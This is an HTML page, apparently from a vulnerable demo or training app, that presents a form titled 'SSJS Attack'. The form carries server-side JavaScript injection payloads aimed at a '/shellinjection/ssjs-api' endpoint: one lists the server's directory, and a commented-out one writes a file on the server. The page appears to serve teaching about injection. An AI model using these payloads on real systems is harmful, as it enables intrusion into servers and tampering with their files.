<!DOCTYPE html>
<html>
  <head>
    <title>SSJS Attack</title>
    <link rel='stylesheet' href='/stylesheets/style.css' />
    <style>
      #year {
        font-size:20px;
        width: 500px;
      }
    </style>
  </head>
  <body>
    <h1>SSJS Attack</h1>
    <p>Lets try a different payload</p>
    <form id="myForm" method="POST" action="/shellinjection/ssjs-api">
    <input style="width: 500px" value="res.end(require('fs').readdirSync('.').toString())" name="year" id="year" />
    <!--<input style="width: 500px" value="require('fs').writeFileSync('badcode.js','MUHAHAHAHAHA','utf8')" name="year" id="year" />-->

    
    <button type="submit">Submit</button>
    </form>

  </body>
</html>
